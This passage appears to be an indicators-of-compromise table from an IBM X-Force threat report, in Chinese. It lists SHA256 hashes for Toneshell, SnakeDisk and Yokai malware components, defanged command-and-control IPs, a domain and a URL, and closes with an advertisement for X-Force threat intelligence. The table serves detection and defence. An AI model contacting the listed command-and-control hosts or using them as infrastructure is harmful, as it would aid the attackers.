cf6b1293e706ce00d7cba9a8b7
2b3780298dc25d

SHA256

包含 Toneshell 分叉版本的加载器（作为 Toneshell9 的开发基础）

123.253.34[.]44

IPv4

Toneshell9 C2 服务器

www.slickvpn[.]com

Toneshell9 C2 服务器

dd694aaf44731da313e4594d
6ca34a6b8e0fcce505e39f827
3b9242fdf6220e0

SHA256

SnakeDisk USB 蠕虫

bb5bb82e5caf7d4dbbe878b7
5b23f793a5f3c5ca6dba70d8b
e447e8c004d26ce 

SHA256

SnakeDisk 用于 DLL 侧载 Yokai 后门的良性 EXE 载荷

35bec1d8699d29c27b66e564
6e58d25ce85ea1e41481d048b
cea89ea94f8fb4b 

SHA256

Yokai 后门 DLL

http://118.174.183[.]89/kptinfo
/import/index.php

URL

Yokai C2 服务器

IBM X-Force Premier 威胁情报现已与 Filigran 的 OpenCTI 集成，提供有关该威胁活动等的可操作情报。获取有关威胁参与者、恶意软件和行业风险的洞察分析。安装 X-Force OpenCTI Connector 以增强检测和响应，利用 IBM X-Force 的专业知识来加强您的网络安全。立即试用 X-Force Premier Threat Intelligence 30 天！